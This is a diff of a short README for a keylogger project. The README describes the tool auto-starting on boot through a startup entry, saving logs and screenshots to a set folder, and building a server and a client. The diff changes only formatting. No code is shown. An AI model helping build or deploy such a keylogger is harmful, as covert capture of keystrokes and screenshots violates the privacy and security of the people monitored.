pcthuoc/keyloger_but/README.md

 - AutoStart : Keylogger has functionaility to auto execute on system bootup.
 It Insert entry on system startup program when it is running.
 ### How to Use ?

-1. change path folder to save log and screenshot.
+1. change path folder to save log and screenshot:
-  - const char filePath[] = "/home/pcthuoc/Desktop/server/log/";
+ >const char filePath[] = "/home/pcthuoc/Desktop/server/log/";
 3. build sever
 4. buid client